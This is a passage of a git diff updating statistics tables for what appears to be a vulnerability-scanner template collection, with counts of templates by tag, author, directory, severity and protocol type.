splint3r7","count":2},{"name":"0xelkomy","count":2},{"name":"paperpen","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"taielab","count":2},{"name":"joeldeleep","count":2},{"name":"danielmofer","count":2},{"name":"pxmme1337","count":2},{"name":"dheerajmadhukar","count":2},{"name":"lotusdll","count":2},{"name":"sy3omda","count":2},{"name":"w4cky_","count":2},{"name":"redteambrasil","count":2},{"name":"huowuzhao","count":2},{"name":"swissky","count":2},{"name":"nkxxkn","count":2},{"name":"moritz nentwig","count":2},{"name":"randomrobbie","count":2},{"name":"smaranchand","count":2},{"name":"aresx","count":1},{"name":"justmumu","count":1},{"name":"zandros0","count":1},{"name":"0xtavian","count":1},{"name":"ahmetpergamum","count":1},{"name":"hexcat","count":1},{"name":"berkdusunur","count":1},{"name":"jeya.seelan","count":1},{"name":"exceed","count":1},{"name":"amnotacat","count":1},{"name":"mhdsamx","count":1},{"name":"bughuntersurya","count":1},{"name":"yashgoti","count":1},{"name":"sherlocksecurity","count":1},{"name":"jas37","count":1},{"name":"absshax","count":1},{"name":"phyr3wall","count":1},{"name":"_harleo","count":1},{"name":"push4d","count":1},{"name":"brenocss","count":1},{"name":"thesubtlety","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"lethargynavigator","count":1},{"name":"hanlaomo","count":1},{"name":"ringo","count":1},{"name":"orpheus","count":1},{"name":"clarkvoss","count":1},{"name":"akshansh","count":1},{"name":"tim_koopmans","count":1},{"name":"charanrayudu","count":1},{"name":"regala_","count":1},{"name":"shifacyclewla","count":1},{"name":"ofjaaah","count":1},{"name":"s1r1u5_","count":1},{"name":"rschio","count":1},{"name":"husain","count":1},{"name":"3th1c_yuk1","count":1},{"name":"andirrahmani1","count":1},{"name":"thebinitghimire","count":1},{"name":"affix","count":1},{"name":"jrolf","count":1},{"name":"jeya seelan","count":1},{"name":"coldfish","count":1},{"name":"xstp","count":1},{"name":"0xteles","count":1},{"name":"v0idc0de","count":1},{"name":"intx0x80","count":1},{"name":"kabirsuda","count":1},{"name":"ahmed sherif","count":1},{"name":"0xceeb","count":1},{"name":"0xh7ml","count":1},{"name":"yuansec","count":1},{"name":"toufik-airane","count":1},{"name":"daffianfo","count":1},{"name":"yashanand155","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"rojanrijal","count":1},{"name":"ohlinge","count":1},{"name":"prettyboyaaditya","count":1},{"name":"mubassirpatel","count":1},{"name":"wlayzz","count":1},{"name":"nerrorsec","count":1},{"name":"pudsec","count":1},{"name":"xshuden","count":1},{"name":"philippdelteil","count":1},{"name":"sshell","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"arr0way","count":1},{"name":"myztique","count":1},{"name":"knassar702","count":1},{"name":"willd96","count":1},{"name":"dawid-czarnecki","count":1},{"name":"tea","count":1},{"name":"evan rubinstien","count":1},{"name":"0ut0fb4nd","count":1},{"name":"rotemreiss","count":1},{"name":"compr00t","count":1},{"name":"wabafet","count":1},{"name":"co0nan","count":1},{"name":"revblock","count":1},{"name":"ggranjus","count":1},{"name":"akash.c","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"harshinsecurity","count":1},{"name":"official_blackhat13","count":1},{"name":"fmunozs","count":1},{"name":"luskabol","count":1},{"name":"evolutionsec","count":1},{"name":"juicypotato1","count":1},{"name":"xeldax","count":1},{"name":"kailashbohara","count":1},{"name":"mass0ma","count":1},{"name":"mah3sec_","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dievus","count":1},{"name":"duty_1g","count":1},{"name":"udyz","count":1},{"name":"alperenkesk","count":1},{"name":"ahmed abou-ela","count":1},{"name":"hakluke","count":1},{"name":"florianmaak","count":1},{"name":"b0yd","count":1},{"name":"sickwell","count":1},{"name":"patralos","count":1},{"name":"apt-mirror","count":1},{"name":"bartu utku sarp","count":1},{"name":"nytr0gen","count":1},{"name":"noamrathaus","count":1},{"name":"act1on3","count":1},{"name":"alex","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"makyotox","count":1},{"name":"elmahdi","count":1},{"name":"d4vy","count":1},{"name":"th3.d1p4k","count":1},{"name":"p-l-","count":1},{"name":"cookiehanhoan","count":1},{"name":"momen eldawakhly","count":1},{"name":"f1she3","count":1},{"name":"alevsk","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"andysvints","count":1},{"name":"droberson","count":1},{"name":"ldionmarcil","count":1},{"name":"micha3lb3n","count":1},{"name":"retr0","count":1},{"name":"x6263","count":1},{"name":"soyelmago","count":1},{"name":"jteles","count":1},{"name":"ok_bye_now","count":1},{"name":"qlkwej","count":1},{"name":"skylark-lab","count":1},{"name":"igibanez","count":1},{"name":"shreyapohekar","count":1},{"name":"streetofhackerr007","count":1},{"name":"thevillagehacker","count":1},{"name":"izn0u","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"nielsing","count":1},{"name":"breno_css","count":1},{"name":"chron0x","count":1},{"name":"notsoevilweasel","count":1},{"name":"zhenwarx","count":1},{"name":"blckraven","count":1},{"name":"anon-artist","count":1},{"name":"infosecsanyam","count":1},{"name":"0xrod","count":1},{"name":"retr02332","count":1},{"name":"kiks7","count":1},{"name":"osamahamad","count":1},{"name":"thezakman","count":1},{"name":"luqmaan hadia","count":1},{"name":"zinminphy0","count":1},{"name":"manuelbua","count":1},{"name":"majidmc2","count":1},{"name":"becivells","count":1},{"name":"furkansayim","count":1},{"name":"ipanda","count":1},{"name":"tirtha_mandal","count":1},{"name":"miroslavsotak","count":1},{"name":"clment cruchet","count":1},{"name":"exploitation","count":1},{"name":"lark lab","count":1},{"name":"mesaglio","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"iampritam","count":1},{"name":"exid","count":1},{"name":"petruknisme","count":1},{"name":"tirtha","count":1},{"name":"yavolo","count":1},{"name":"shelld3v","count":1},{"name":"b0rn2r00t","count":1},{"name":"j33n1k4","count":1},{"name":"sec_hawk","count":1},{"name":"0h1in9e","count":1},{"name":"0xd0ff9","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"geraldino2","count":1},{"name":"bad5ect0r","count":1},{"name":"deena","count":1},{"name":"rodnt","count":1},{"name":"manasmbellani","count":1},{"name":"zsusac","count":1},{"name":"aaronchen0","count":1},{"name":"fq_hsu","count":1},{"name":"remonsec","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"adrianmf","count":1},{"name":"un-fmunozs","count":1},{"name":"kareemse1im","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"furkansenan","count":1},{"name":"0xceba","count":1},{"name":"schniggie","count":1},{"name":"kurohost","count":1},{"name":"ilovebinbash","count":1},{"name":"borna nematzadeh","count":1},{"name":"elouhi","count":1},{"name":"ooooooo_q","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"omarkurt","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"arall","count":1},{"name":"gboddin","count":1},{"name":"kaizensecurity","count":1},{"name":"daviey","count":1},{"name":"mrcl0wnlab","count":1},{"name":"notnotnotveg","count":1},{"name":"flag007","count":1},{"name":"narluin","count":1},{"name":"b4uh0lz","count":1},{"name":"oscarintherocks","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"c3l3si4n","count":1},{"name":"noobexploiter","count":1},{"name":"francescocarlucci","count":1},{"name":"2rs3c","count":1},{"name":"_darrenmartyn","count":1},{"name":"luqman","count":1},{"name":"undefl0w","count":1},{"name":"veshraj","count":1},{"name":"brabbit10","count":1},{"name":"d0rkerdevil","count":1},{"name":"pratik khalane","count":1},{"name":"vzamanillo","count":1},{"name":"elder tao","count":1},{"name":"sicksec","count":1},{"name":"opencirt","count":1},{"name":"whynotke","count":1},{"name":"bjhulst","count":1},{"name":"_c0wb0y_","count":1},{"name":"jiheon-dev","count":1},{"name":"pdp","count":1},{"name":"dhiyaneshdki","count":1},{"name":"rubina119","count":1},{"name":"alexrydzak","count":1},{"name":"jbaines-r7","count":1}],"directory":[{"name":"cves","count":1154},{"name":"exposed-panels","count":519},{"name":"vulnerabilities","count":446},{"name":"technologies","count":251},{"name":"exposures","count":203},{"name":"misconfiguration","count":196},{"name":"workflows","count":186},{"name":"token-spray","count":153},{"name":"default-logins","count":95},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1183},{"name":"high","count":870},{"name":"medium","count":658},{"name":"critical","count":411},{"name":"low","count":180},{"name":"unknown","count":6}],"types":[{"name":"http","count":3164},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index bf8962df36..e6efa3ef83 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,1546 +1,1546 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1146 | daffainfo | 560 | cves | 1150 | info | 1183 | http | 3159 | -| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 868 | file | 68 | -| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 656 | network | 50 | -| xss | 361 | pdteam | 262 | technologies | 251 | critical | 410 | dns | 17 | +| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 | +| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 | +| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 | +| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 | | wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | -| exposure | 292 | dwisiswant0 | 167 | misconfiguration | 196 | unknown | 6 | | | -| rce | 288 | princechaddha | 130 | workflows | 186 | | | | | -| cve2021 | 282 | 0x_akoko | 128 | token-spray | 153 | | | | | -| tech | 265 | gy741 | 117 | default-logins | 94 | | | | | +| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | | +| rce | 289 | princechaddha | 130 | workflows | 186 | | | | | +| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | | +| tech | 265 | gy741 | 117 | default-logins | 95 | | | | | | wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | | cve2020 | 196 | madrobot | 65 | takeovers | 67 | | | | | | | 188 | zzeitlin | 64 | iot | 38 | | | | | | token-spray | 153 | idealphase | 46 | network | 35 | | | | | | joomla | 131 | gaurang | 42 | miscellaneous | 23 | | | | | -| config | 126 | philippedelteil | 36 | cnvd | 22 | | | | | -| cve2018 | 120 | ritikchaddha | 35 | dns | 17 | | | | | +| config | 126 | ritikchaddha | 37 | cnvd | 22 | | | | | +| cve2018 | 120 | philippedelteil | 36 | dns | 17 | | | | | | apache | 120 | adam crosser | 30 | fuzzing | 12 | | | | | -| cve2019 | 117 | ice3man | 26 | headless | 6 | | | | | +| cve2019 | 118 | ice3man | 26 | headless | 6 | | | | | | cve2010 | 111 | organiccrap | 24 | ssl | 4 | | | | | -| default-login | 108 | c-sh0 | 23 | | | | | | | -| unauth | 102 | ffffffff0x | 22 | | | | | | | +| default-login | 109 | c-sh0 | 23 | | | | | | | +| unauth | 103 | ffffffff0x | 22 | | | | | | | | iot | 102 | righettod | 18 | | | | | | | | oast | 96 | cckuailong | 17 | | | | | | | | login | 85 | akincibor | 16 | | | | | | | -| takeover | 73 | for3stco1d | 15 | | | | | | | -| token | 72 | pr3r00t | 15 | | | | | | | -| redirect | 68 | sheikhrishad | 15 | | | | | | | -| misconfig | 65 | milo2012 | 14 | | | | | | | -| cve2017 | 63 | techbrunchfr | 14 | | | | | | | -| sqli | 62 | r3dg33k | 14 | | | | | | | +| takeover | 73 | pr3r00t | 15 | | | | | | | +| token | 72 | sheikhrishad | 15 | | | | | | | +| redirect | 68 | for3stco1d | 15 | | | | | | | +| misconfig | 65 | r3dg33k | 14 | | | | | | | +| cve2017 | 64 | techbrunchfr | 14 | | | | | | | +| sqli | 62 | milo2012 | 14 | | | | | | | | ssrf | 60 | sharath | 13 | | | | | | | | file | 60 | sullo | 12 | | | | | | | -| cve2022 | 58 | suman_kar | 12 | | | | | | | -| network | 53 | cyllective | 11 | | | | | | | -| oracle | 50 | wdahlenb | 11 | | | | | | | -| router | 49 | melbadry9 | 11 | | | | | | | -| wp | 49 | meme-lord | 10 | | | | | | | -| disclosure | 45 | alph4byt3 | 10 | | | | | | | -| cve2016 | 45 | nadino | 10 | | | | | | | -| plugin | 40 | hackergautam | 10 | | | | | | | -| cve2014 | 37 | johnk3r | 10 | | | | | | | -| auth-bypass | 37 | random_robbie | 10 | | | | | | | -| cve2015 | 36 | emadshanab | 9 | | | | | | | -| google | 36 | dogasantos | 9 | | | | | | | -| cisco | 35 | zh | 8 | | | | | | | -| authenticated | 35 | iamthefrogy | 8 | | | | | | | -| logs | 33 | that_juan_ | 8 | | | | | | | -| atlassian | 32 | aashiq | 8 | | | | | | | -| injection | 30 | oppsec | 7 | | | | | | | -| listing | 30 | divya_mudgal | 7 | | | | | | | -| jira | 30 | harshbothra_ | 7 | | | | | | | -| traversal | 29 | dr_set | 7 | | | | | | | -| devops | 28 | kophjager007 | 7 | | | | | | | -| kubernetes | 25 | random-robbie | 7 | | | | | | | -| generic | 25 | edoardottt | 7 | | | | | | | -| oss | 24 | techryptic (@tech) | 7 | | | | | | | -| cms | 24 | randomstr1ng | 7 | | | | | | | -| adobe | 24 | 0x240x23elu | 7 | | | | | | | -| springboot | 24 | logicalhunter | 7 | | | | | | | -| proxy | 22 | pathtaga | 6 | | | | | | | -| sap | 22 | pentest_swissky | 6 | | | | | | | +| cve2022 | 59 | suman_kar | 12 | | | | | | | +| network | 53 | melbadry9 | 11 | | | | | | | +| oracle | 50 | cyllective | 11 | | | | | | | +| wp | 49 | wdahlenb | 11 | | | | | | | +| router | 49 | nadino | 10 | | | | | | | +| disclosure | 45 | meme-lord | 10 | | | | | | | +| cve2016 | 45 | hackergautam | 10 | | | | | | | +| plugin | 40 | johnk3r | 10 | | | | | | | +| cve2014 | 37 | random_robbie | 10 | | | | | | | +| auth-bypass | 37 | alph4byt3 | 10 | | | | | | | +| google | 36 | emadshanab | 9 | | | | | | | +| cve2015 | 36 | dogasantos | 9 | | | | | | | +| cisco | 35 | aashiq | 8 | | | | | | | +| authenticated | 35 | zh | 8 | | | | | | | +| logs | 33 | iamthefrogy | 8 | | | | | | | +| atlassian | 32 | edoardottt | 8 | | | | | | | +| injection | 30 | that_juan_ | 8 | | | | | | | +| listing | 30 | logicalhunter | 7 | | | | | | | +| jira | 30 | techryptic (@tech) | 7 | | | | | | | +| traversal | 29 | kophjager007 | 7 | | | | | | | +| devops | 28 | oppsec | 7 | | | | | | | +| generic | 25 | random-robbie | 7 | | | | | | | +| kubernetes | 25 | randomstr1ng | 7 | | | | | | | +| adobe | 24 | harshbothra_ | 7 | | | | | | | +| cms | 24 | divya_mudgal | 7 | | | | | | | +| oss | 24 | 0x240x23elu | 7 | | | | | | | +| springboot | 24 | dr_set | 7 | | | | | | | +| proxy | 22 | iamnoooob | 6 | | | | | | | | cnvd | 22 | caspergn | 6 | | | | | | | -| misc | 21 | iamnoooob | 6 | | | | | | | +| sap | 22 | puzzlepeaches | 6 | | | | | | | | aem | 21 | rootxharsh | 6 | | | | | | | -| vmware | 21 | forgedhallpass | 6 | | | | | | | -| intrusive | 21 | leovalcante | 6 | | | | | | | -| debug | 21 | puzzlepeaches | 6 | | | | | | | -| microsoft | 21 | __fazal | 6 | | | | | | | -| fuzz | 20 | evan rubinstein | 6 | | | | | | | -| service | 20 | xelkomy | 5 | | | | | | | -| wp-theme | 19 | imnightmaree | 5 | | | | | | | -| cve2012 | 19 | _0xf4n9x_ | 5 | | | | | | | -| php | 18 | podalirius | 5 | | | | | | | -| manageengine | 18 | elsfa7110 | 5 | | | | | | | -| dns | 18 | yanyun | 5 | | | | | | | -| tomcat | 17 | panch0r3d | 5 | | | | | | | -| deserialization | 17 | lu4nx | 5 | | | | | | | -| weblogic | 17 | ganofins | 5 | | | | | | | -| aws | 17 | joanbono | 5 | | | | | | | -| zoho | 17 | praetorian-thendrickson | 5 | | | | | | | -| ibm | 16 | defr0ggy | 4 | | | | | | | -| k8s | 16 | nodauf | 4 | | | | | | | -| jenkins | 15 | dadevel | 4 | | | | | | | +| microsoft | 21 | evan rubinstein | 6 | | | | | | | +| misc | 21 | pathtaga | 6 | | | | | | | +| intrusive | 21 | __fazal | 6 | | | | | | | +| vmware | 21 | leovalcante | 6 | | | | | | | +| debug | 21 | forgedhallpass | 6 | | | | | | | +| service | 20 | pentest_swissky | 6 | | | | | | | +| fuzz | 20 | _0xf4n9x_ | 5 | | | | | | | +| cve2012 | 19 | elsfa7110 | 5 | | | | | | | +| wp-theme | 19 | xelkomy | 5 | | | | | | | +| manageengine | 19 | joanbono | 5 | | | | | | | +| php | 18 | panch0r3d | 5 | | | | | | | +| dns | 18 | ganofins | 5 | | | | | | | +| zoho | 18 | lu4nx | 5 | | | | | | | +| deserialization | 17 | yanyun | 5 | | | | | | | +| tomcat | 17 | podalirius | 5 | | | | | | | +| weblogic | 17 | praetorian-thendrickson | 5 | | | | | | | +| aws | 17 | imnightmaree | 5 | | | | | | | +| k8s | 16 | tanq16 | 4 | | | | | | | +| ibm | 16 | incogbyte | 4 | | | | | | | +| cve2011 | 15 | tess | 4 | | | | | | | +| jenkins | 15 | defr0ggy | 4 | | | | | | | +| gitlab | 15 | dolev farhi | 4 | | | | | | | | dlink | 15 | e_schultze_ | 4 | | | | | | | -| gitlab | 15 | incogbyte | 4 | | | | | | | -| cve2011 | 15 | dolev farhi | 4 | | | | | | | -| struts | 15 | wisnupramoedya | 4 | | | | | | | -| android | 14 | tanq16 | 4 | | | | | | | -| fileupload | 14 | tess | 4 | | | | | | | -| java | 14 | mr-xn | 3 | | | | | | | -| cve2009 | 14 | davidmckennirey | 3 | | | | | | | -| xxe | 14 | yash anand @yashanand155 | 3 | | | | | | | -| hp | 14 | emenalf | 3 | | | | | | | -| api | 14 | skeltavik | 3 | | | | | | | -| camera | 13 | r3naissance | 3 | | | | | | | -| ruijie | 13 | github.com/its0x08 | 3 | | | | | | | -| cve2013 | 12 | whoever | 3 | | | | | | | -| rails | 12 | dudez | 3 | | | | | | | -| printer | 12 | supras | 3 | | | | | | | -| status | 12 | arcc | 3 | | | | | | | -| log4j | 12 | andydoering | 3 | | | | | | | -| netsweeper | 12 | yuzhe-zhang-0 | 3 | | | | | | | -| netgear | 11 | f1tz | 3 | | | | | | | -| magento | 11 | gitlab red team | 3 | | | | | | | -| nginx | 11 | impramodsargar | 3 | | | | | | | -| upload | 11 | thomas_from_offensity | 3 | | | | | | | -| lfr | 11 | lark-lab | 3 | | | | | | | -| firewall | 11 | mavericknerd | 3 | | | | | | | -| graphql | 11 | fyoorer | 3 | | | | | | | -| cnvd2021 | 11 | _generic_human_ | 3 | | | | | | | -| airflow | 10 | alifathi-h1 | 3 | | | | | | | -| backup | 10 | shine | 3 | | | | | | | -| jolokia | 10 | h1ei1 | 3 | | | | | | | -| grafana | 10 | me9187 | 3 | | | | | | | -| auth | 10 | z3bd | 3 | | | | | | | -| fortigate | 10 | johnjhacking | 3 | | | | | | | -| dell | 10 | 0w4ys | 3 | | | | | | | -| coldfusion | 10 | shifacyclewala | 3 | | | | | | | -| glpi | 10 | unstabl3 | 3 | | | | | | | -| spring | 10 | sushantkamble | 3 | | | | | | | -| laravel | 9 | jarijaas | 3 | | | | | | | -| jndi | 9 | binaryfigments | 3 | | | | | | | -| ftp | 9 | sbani | 2 | | | | | | | -| fastjson | 9 | fabaff | 2 | | | | | | | -| github | 9 | manas_harsh | 2 | | | | | | | -| windows | 9 | bsysop | 2 | | | | | | | -| drupal | 9 | ehsahil | 2 | | | | | | | -| zabbix | 9 | cocxanh | 2 | | | | | | | -| cve2008 | 9 | bernardofsr | 2 | | | | | | | -| woocommerce | 9 | ree4pwn | 2 | | | | | | | -| webserver | 9 | redteambrasil | 2 | | | | | | | +| struts | 15 | dadevel | 4 | | | | | | | +| hp | 14 | nodauf | 4 | | | | | | | +| api | 14 | wisnupramoedya | 4 | | | | | | | +| android | 14 | me9187 | 3 | | | | | | | +| xxe | 14 | shine | 3 | | | | | | | +| java | 14 | f1tz | 3 | | | | | | | +| fileupload | 14 | alifathi-h1 | 3 | | | | | | | +| cve2009 | 14 | fyoorer | 3 | | | | | | | +| camera | 13 | andydoering | 3 | | | | | | | +| ruijie | 13 | _generic_human_ | 3 | | | | | | | +| log4j | 12 | h1ei1 | 3 | | | | | | | +| netsweeper | 12 | z3bd | 3 | | | | | | | +| printer | 12 | github.com/its0x08 | 3 | | | | | | | +| lfr | 12 | lark-lab | 3 | | | | | | | +| cve2013 | 12 | unstabl3 | 3 | | | | | | | +| status | 12 | mavericknerd | 3 | | | | | | | +| rails | 12 | yuzhe-zhang-0 | 3 | | | | | | | +| cnvd2021 | 11 | binaryfigments | 3 | | | | | | | +| nginx | 11 | gitlab red team | 3 | | | | | | | +| firewall | 11 | skeltavik | 3 | | | | | | | +| upload | 11 | jarijaas | 3 | | | | | | | +| magento | 11 | arcc | 3 | | | | | | | +| graphql | 11 | johnjhacking | 3 | | | | | | | +| netgear | 11 | impramodsargar | 3 | | | | | | | +| spring | 10 | r3naissance | 3 | | | | | | | +| fortigate | 10 | dudez | 3 | | | | | | | +| grafana | 10 | davidmckennirey | 3 | | | | | | | +| coldfusion | 10 | supras | 3 | | | | | | | +| dell | 10 | emenalf | 3 | | | | | | | +| jolokia | 10 | whoever | 3 | | | | | | | +| auth | 10 | shifacyclewala | 3 | | | | | | | +| glpi | 10 | yash anand @yashanand155 | 3 | | | | | | | +| backup | 10 | mr-xn | 3 | | | | | | | +| airflow | 10 | sushantkamble | 3 | | | | | | | +| woocommerce | 9 | 0w4ys | 3 | | | | | | | +| fastjson | 9 | thomas_from_offensity | 3 | | | | | | | +| mirai | 9 | cocxanh | 2 | | | | | | | +| ftp | 9 | x1m_martijn | 2 | | | | | | | +| windows | 9 | ambassify | 2 | | | | | | | | fortinet | 9 | its0x08 | 2 | | | | | | | -| iis | 8 | splint3r7 | 2 | | | | | | | -| prometheus | 8 | huowuzhao | 2 | | | | | | | -| blind | 8 | hahwul | 2 | | | | | | | -| metadata | 8 | convisoappsec | 2 | | | | | | | -| amazon | 8 | z0ne | 2 | | | | | | | -| phpmyadmin | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| azure | 8 | hetroublemakr | 2 | | | | | | | -| confluence | 8 | bing0o | 2 | | | | | | | -| solr | 8 | k11h-de | 2 | | | | | | | -| scada | 8 | 0xprial | 2 | | | | | | | -| audit | 8 | hassan khan yusufzai - | 2 | | | | | | | -| | | splint3r7 | | | | | | | | -| django | 8 | gevakun | 2 | | | | | | | -| wso2 | 8 | raesene | 2 | | | | | | | -| citrix | 8 | parth | 2 | | | | | | | -| vcenter | 8 | smaranchand | 2 | | | | | | | -| bypass | 8 | 0xelkomy | 2 | | | | | | | -| mirai | 8 | koti2 | 2 | | | | | | | -| kafka | 7 | 0xrudra | 2 | | | | | | | -| bucket | 7 | ambassify | 2 | | | | | | | -| firebase | 7 | thardt-praetorian | 2 | | | | | | | -| elasticsearch | 7 | bp0lr | 2 | | | | | | | -| maps | 7 | nvn1729 | 2 | | | | | | | -| vpn | 7 | paperpen | 2 | | | | | | | +| webserver | 9 | parth | 2 | | | | | | | +| zabbix | 9 | danielmofer | 2 | | | | | | | +| drupal | 9 | lotusdll | 2 | | | | | | | +| cve2008 | 9 | bsysop | 2 | | | | | | | +| jndi | 9 | nuk3s3c | 2 | | | | | | | +| github | 9 | huowuzhao | 2 | | | | | | | +| laravel | 9 | kiblyn11 | 2 | | | | | | | +| metadata | 8 | 0xcrypto | 2 | | | | | | | +| amazon | 8 | swissky | 2 | | | | | | | +| audit | 8 | z0ne | 2 | | | | | | | +| prometheus | 8 | bananabr | 2 | | | | | | | +| solr | 8 | r12w4n | 2 | | | | | | | +| phpmyadmin | 8 | mohammedsaneem | 2 | | | | | | | +| azure | 8 | redteambrasil | 2 | | | | | | | +| django | 8 | cckuakilong | 2 | | | | | | | +| scada | 8 | gevakun | 2 | | | | | | | +| blind | 8 | martincodes-de | 2 | | | | | | | +| iis | 8 | bing0o | 2 | | | | | | | +| confluence | 8 | paperpen | 2 | | | | | | | +| bypass | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| citrix | 8 | 0xsapra | 2 | | | | | | | +| vcenter | 8 | gal nagli | 2 | | | | | | | +| wso2 | 8 | rafaelwdornelas | 2 | | | | | | | | rconfig | 7 | afaq | 2 | | | | | | | -| ssti | 7 | rafaelwdornelas | 2 | | | | | | | -| sonicwall | 7 | vavkamil | 2 | | | | | | | -| exchange | 7 | x1m_martijn | 2 | | | | | | | -| python | 7 | danielmofer | 2 | | | | | | | -| squirrelmail | 7 | dheerajmadhukar | 2 | | | | | | | -| mail | 7 | mohammedsaneem | 2 | | | | | | | -| files | 7 | udit_thakkur | 2 | | | | | | | -| kube | 7 | pxmme1337 | 2 | | | | | | | -| cobbler | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| huawei | 6 | amsda | 2 | | | | | | | -| enum | 6 | 0xcrypto | 2 | | | | | | | -| nodejs | 6 | cckuakilong | 2 | | | | | | | -| docker | 6 | sy3omda | 2 | | | | | | | -| fpd | 6 | moritz nentwig | 2 | | | | | | | -| ofbiz | 6 | bananabr | 2 | | | | | | | -| cnvd2020 | 6 | 0xsapra | 2 | | | | | | | -| druid | 6 | foulenzer | 2 | | | | | | | -| zimbra | 6 | y4er | 2 | | | | | | | -| sitecore | 6 | luci | 2 | | | | | | | -| magmi | 6 | dahse89 | 2 | | | | | | | -| cicd | 6 | taielab | 2 | | | | | | | -| backdoor | 6 | lotusdll | 2 | | | | | | | -| go | 6 | geekby | 2 | | | | | | | -| jboss | 6 | zomsop82 | 2 | | | | | | | -| jetty | 6 | joeldeleep | 2 | | | | | | | -| headless | 6 | hackerarpan | 2 | | | | | | | -| slack | 6 | 0xsmiley | 2 | | | | | | | -| crlf | 6 | swissky | 2 | | | | | | | -| firmware | 6 | w4cky_ | 2 | | | | | | | -| lucee | 6 | r12w4n | 2 | | | | | | | -| bigip | 5 | randomrobbie | 2 | | | | | | | -| node | 5 | nuk3s3c | 2 | | | | | | | -| microweber | 5 | paradessia | 2 | | | | | | | -| ssl | 5 | kre80r | 2 | | | | | | | -| zhiyuan | 5 | vsh00t | 2 | | | | | | | -| setup | 5 | gal nagli | 2 | | | | | | | -| error | 5 | g4l1t0 | 2 | | | | | | | -| cache | 5 | socketz | 2 | | | | | | | -| rfi | 5 | kiblyn11 | 2 | | | | | | | -| git | 5 | martincodes-de | 2 | | | | | | | -| moodle | 5 | nkxxkn | 2 | | | | | | | -| metinfo | 5 | ajaysenr | 2 | | | | | | | -| minio | 5 | b4uh0lz | 1 | | | | | | | -| strapi | 5 | tirtha | 1 | | | | | | | -| icewarp | 5 | lark lab | 1 | | | | | | | -| solarwinds | 5 | hakluke | 1 | | | | | | | -| leak | 5 | thesubtlety | 1 | | | | | | | -| rseenet | 5 | izn0u | 1 | | | | | | | -| samsung | 5 | husain | 1 | | | | | | | -| symantec | 5 | tim_koopmans | 1 | | | | | | | -| artica | 5 | kishore krishna (sillydaddy) | 1 | | | | | | | +| files | 7 | amsda | 2 | | | | | | | +| sonicwall | 7 | hassan khan yusufzai - | 2 | | | | | | | +| | | splint3r7 | | | | | | | | +| mail | 7 | pxmme1337 | 2 | | | | | | | +| python | 7 | dahse89 | 2 | | | | | | | +| elasticsearch | 7 | zomsop82 | 2 | | | | | | | +| exchange | 7 | 0xelkomy | 2 | | | | | | | +| vpn | 7 | hackerarpan | 2 | | | | | | | +| ssti | 7 | hetroublemakr | 2 | | | | | | | +| squirrelmail | 7 | nvn1729 | 2 | | | | | | | +| firebase | 7 | udit_thakkur | 2 | | | | | | | +| maps | 7 | geekby | 2 | | | | | | | +| bucket | 7 | ajaysenr | 2 | | | | | | | +| kafka | 7 | y4er | 2 | | | | | | | +| kube | 7 | foulenzer | 2 | | | | | | | +| crlf | 6 | convisoappsec | 2 | | | | | | | +| cicd | 6 | vsh00t | 2 | | | | | | | +| zimbra | 6 | ehsahil | 2 | | | | | | | +| sitecore | 6 | 0xprial | 2 | | | | | | | +| cobbler | 6 | kre80r | 2 | | | | | | | +| lucee | 6 | vavkamil | 2 | | | | | | | +| huawei | 6 | w4cky_ | 2 | | | | | | | +| headless | 6 | moritz nentwig | 2 | | | | | | | +| cnvd2020 | 6 | thardt-praetorian | 2 | | | | | | | +| go | 6 | taielab | 2 | | | | | | | +| fpd | 6 | nkxxkn | 2 | | | | | | | +| druid | 6 | 0xrudra | 2 | | | | | | | +| nodejs | 6 | k11h-de | 2 | | | | | | | +| magmi | 6 | randomrobbie | 2 | | | | | | | +| slack | 6 | smaranchand | 2 | | | | | | | +| jboss | 6 | joeldeleep | 2 | | | | | | | +| jetty | 6 | bp0lr | 2 | | | | | | | +| enum | 6 | sy3omda | 2 | | | | | | | +| bigip | 6 | hahwul | 2 | | | | | | | +| backdoor | 6 | raesene | 2 | | | | | | | +| docker | 6 | mahendra purbia (mah3sec_) | 2 | 